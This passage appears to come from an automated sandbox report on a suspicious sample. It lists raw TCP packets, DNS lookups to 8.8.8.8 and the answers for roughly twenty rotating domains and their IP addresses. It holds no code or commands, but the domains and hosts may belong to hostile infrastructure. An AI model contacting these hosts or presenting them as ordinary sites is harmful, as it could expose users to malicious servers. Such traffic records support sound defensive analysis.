                                                                                                                      Mar 20, 2023 09:10:46.770569086 CET4972780192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:46.770761967 CET4972780192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:47.027081013 CET8049727203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:47.041836023 CET8049727203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:47.041882992 CET8049727203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:47.042005062 CET4972780192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:48.281251907 CET4972780192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:49.292587996 CET4972880192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:49.549352884 CET8049728203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:49.549590111 CET4972880192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:49.549992085 CET4972880192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:49.806487083 CET8049728203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:49.806529045 CET8049728203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:49.823268890 CET8049728203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:49.823368073 CET8049728203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:49.823504925 CET4972880192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:51.057768106 CET4972880192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.074810982 CET4972980192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.330857992 CET8049729203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:52.330986977 CET4972980192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.331121922 CET4972980192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.586791992 CET8049729203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:52.588248968 CET8049729203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:52.588278055 CET8049729203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:52.588545084 CET4972980192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.588752985 CET4972980192.168.2.3203.245.24.47
                                                                                                                      Mar 20, 2023 09:10:52.844131947 CET8049729203.245.24.47192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.160823107 CET4973080192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:10:58.184606075 CET8049730217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.184952974 CET4973080192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:10:58.190454006 CET4973080192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:10:58.214163065 CET8049730217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.218595982 CET8049730217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.218637943 CET8049730217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.221270084 CET4973080192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:10:59.699451923 CET4973080192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:00.717092037 CET4973180192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:00.741286039 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.741519928 CET4973180192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:00.747848988 CET4973180192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:00.771832943 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.771908998 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.771934032 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.771960974 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.777687073 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.777730942 CET8049731217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:00.777847052 CET4973180192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:02.582032919 CET4973180192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.591116905 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.614937067 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:03.615056992 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.615211964 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.638726950 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:03.644845963 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:03.644927025 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:03.644952059 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:03.645145893 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.645145893 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.924098969 CET4973280192.168.2.3217.160.0.249
                                                                                                                      Mar 20, 2023 09:11:03.949651003 CET8049732217.160.0.249192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.029407978 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:16.048993111 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.049242973 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:16.049506903 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:16.069130898 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.251960993 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.252011061 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.252038956 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.252110004 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:16.252171040 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:16.271615028 CET8049733199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:16.271802902 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:17.560048103 CET4973380192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.579722881 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.598927975 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.600903988 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.600904942 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.620330095 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.620366096 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.620384932 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.620397091 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.620415926 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804119110 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804193020 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804220915 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804246902 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804277897 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804303885 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804337025 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.804337025 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.804431915 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.804431915 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:18.818600893 CET8049734199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:18.818833113 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:20.119263887 CET4973480192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.123539925 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.142921925 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.144218922 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.144301891 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.163819075 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.350609064 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.350645065 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.350660086 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.350678921 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.351044893 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.351860046 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.368243933 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:21.369180918 CET4973580192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:11:21.371376038 CET8049735199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:26.362476110 CET4973680192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:26.502785921 CET8049736198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:26.502981901 CET4973680192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:26.503138065 CET4973680192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:26.643553019 CET8049736198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:26.643601894 CET8049736198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:26.643654108 CET4973680192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:28.023947954 CET4973680192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:29.030576944 CET4973780192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:29.173032045 CET8049737198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:29.173208952 CET4973780192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:29.173513889 CET4973780192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:29.316364050 CET8049737198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:29.319060087 CET8049737198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:29.319094896 CET8049737198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:29.319247007 CET4973780192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:30.686084986 CET4973780192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:31.702282906 CET4973880192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:31.845990896 CET8049738198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:31.846260071 CET4973880192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:31.846594095 CET4973880192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:31.989573002 CET8049738198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:31.989614010 CET8049738198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:31.989855051 CET4973880192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:31.990077019 CET4973880192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:11:32.132081032 CET8049738198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:44.501287937 CET4973980192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:11:47.515919924 CET4973980192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:11:47.682368994 CET80497395.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:47.682581902 CET4973980192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:11:51.815037012 CET80497395.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:51.815150023 CET4973980192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:11:53.384625912 CET4973980192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:11:53.551618099 CET80497395.181.216.141192.168.2.3

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 20, 2023 09:08:18.059130907 CET6178753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:18.108978987 CET53617878.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.120605946 CET5892153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:23.235593081 CET53589218.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.538893938 CET4997753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET53499778.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:44.356928110 CET5784053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:44.618321896 CET53578408.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:45.622361898 CET5799053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:45.811009884 CET53579908.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:46.827991962 CET5238753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:46.985388994 CET53523878.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:52.008558989 CET5692453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET53569248.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.063662052 CET6062553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:15.094926119 CET53606258.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:27.620827913 CET4930253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:27.751117945 CET53493028.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:38.002252102 CET5397553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET53539758.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:48.362224102 CET5113953192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:48.472723007 CET53511398.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:00.005140066 CET5295553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:00.160120964 CET53529558.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:01.176269054 CET6058253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:01.385709047 CET53605828.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:02.394485950 CET5713453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:02.523490906 CET53571348.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:07.544554949 CET6205053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:07.567246914 CET53620508.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:08.603447914 CET5604253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:08.626447916 CET53560428.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:09.648912907 CET5963653192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:09.669090033 CET53596368.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:14.745964050 CET5563853192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:14.768513918 CET53556388.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:25.792670965 CET5770453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET53577048.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:36.036226034 CET6532053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET53653208.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:46.233026028 CET6076753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET53607678.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.079703093 CET6510753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:58.134869099 CET53651078.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:10.968102932 CET5384853192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:11.017399073 CET53538488.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:37.019893885 CET5757153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:37.163110971 CET53575718.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:38.184684038 CET5869153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:38.328841925 CET53586918.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:39.347182989 CET5330553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:39.494823933 CET53533058.8.8.8192.168.2.3

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Mar 20, 2023 09:08:18.059130907 CET192.168.2.38.8.8.80x7c1dStandard query (0)www.themssterofssuepnse.restA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:23.120605946 CET192.168.2.38.8.8.80xa01dStandard query (0)www.hudsonandbailey.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.538893938 CET192.168.2.38.8.8.80xd7a5Standard query (0)www.virginhairweave.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:44.356928110 CET192.168.2.38.8.8.80x34e3Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:45.622361898 CET192.168.2.38.8.8.80x388cStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:46.827991962 CET192.168.2.38.8.8.80xb63fStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.008558989 CET192.168.2.38.8.8.80x96dcStandard query (0)www.dirdikyepedia.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:15.063662052 CET192.168.2.38.8.8.80xc039Standard query (0)www.g2fm.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:27.620827913 CET192.168.2.38.8.8.80x468dStandard query (0)www.mynichemarket.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.002252102 CET192.168.2.38.8.8.80x2560Standard query (0)www.landlotto.ruA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:48.362224102 CET192.168.2.38.8.8.80xc976Standard query (0)www.gorwly.topA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:00.005140066 CET192.168.2.38.8.8.80x627dStandard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:01.176269054 CET192.168.2.38.8.8.80xbe46Standard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:02.394485950 CET192.168.2.38.8.8.80x1805Standard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:07.544554949 CET192.168.2.38.8.8.80x1492Standard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:08.603447914 CET192.168.2.38.8.8.80x442dStandard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:09.648912907 CET192.168.2.38.8.8.80x46d1Standard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:14.745964050 CET192.168.2.38.8.8.80x87ccStandard query (0)www.ty23vip.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.792670965 CET192.168.2.38.8.8.80xc5abStandard query (0)www.allison2patrick.onlineA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.036226034 CET192.168.2.38.8.8.80x5df2Standard query (0)www.glb-mobility.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.233026028 CET192.168.2.38.8.8.80x9aa8Standard query (0)www.fanversewallet.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:58.079703093 CET192.168.2.38.8.8.80x8e22Standard query (0)www.karlscurry.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:10.968102932 CET192.168.2.38.8.8.80xd22Standard query (0)www.themssterofssuepnse.restA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:37.019893885 CET192.168.2.38.8.8.80x528Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:38.184684038 CET192.168.2.38.8.8.80xacb9Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:39.347182989 CET192.168.2.38.8.8.80x43adStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Mar 20, 2023 09:08:18.108978987 CET8.8.8.8192.168.2.30x7c1dServer failure (2)www.themssterofssuepnse.restnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:23.235593081 CET8.8.8.8192.168.2.30xa01dNo error (0)www.hudsonandbailey.uk199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:44.618321896 CET8.8.8.8192.168.2.30x34e3Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:45.811009884 CET8.8.8.8192.168.2.30x388cServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:46.985388994 CET8.8.8.8192.168.2.30xb63fServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET8.8.8.8192.168.2.30x96dcNo error (0)www.dirdikyepedia.comdirdikyepedia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET8.8.8.8192.168.2.30x96dcNo error (0)dirdikyepedia.com5.181.216.141A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:15.094926119 CET8.8.8.8192.168.2.30xc039No error (0)www.g2fm.co.uk213.171.195.105A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:27.751117945 CET8.8.8.8192.168.2.30x468dNo error (0)www.mynichemarket.co.uk185.151.30.181A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET8.8.8.8192.168.2.30x2560No error (0)www.landlotto.ru109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET8.8.8.8192.168.2.30x2560No error (0)www.landlotto.ru194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:48.472723007 CET8.8.8.8192.168.2.30xc976No error (0)www.gorwly.top192.64.116.162A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:00.160120964 CET8.8.8.8192.168.2.30x627dServer failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:01.385709047 CET8.8.8.8192.168.2.30xbe46Server failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:02.523490906 CET8.8.8.8192.168.2.30x1805Server failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:07.567246914 CET8.8.8.8192.168.2.30x1492Refused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:08.626447916 CET8.8.8.8192.168.2.30x442dRefused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:09.669090033 CET8.8.8.8192.168.2.30x46d1Refused (5)www.thelastwill.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:14.768513918 CET8.8.8.8192.168.2.30x87ccNo error (0)www.ty23vip.com162.209.159.142A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET8.8.8.8192.168.2.30xc5abNo error (0)www.allison2patrick.onlineallison2patrick.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET8.8.8.8192.168.2.30xc5abNo error (0)allison2patrick.online62.4.21.190A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET8.8.8.8192.168.2.30x5df2No error (0)www.glb-mobility.comglb-mobility.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET8.8.8.8192.168.2.30x5df2No error (0)glb-mobility.com88.99.217.197A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET8.8.8.8192.168.2.30x9aa8No error (0)www.fanversewallet.comfanversewallet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET8.8.8.8192.168.2.30x9aa8No error (0)fanversewallet.com203.245.24.47A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:58.134869099 CET8.8.8.8192.168.2.30x8e22No error (0)www.karlscurry.co.uk217.160.0.249A (IP address)IN (0x0001)false
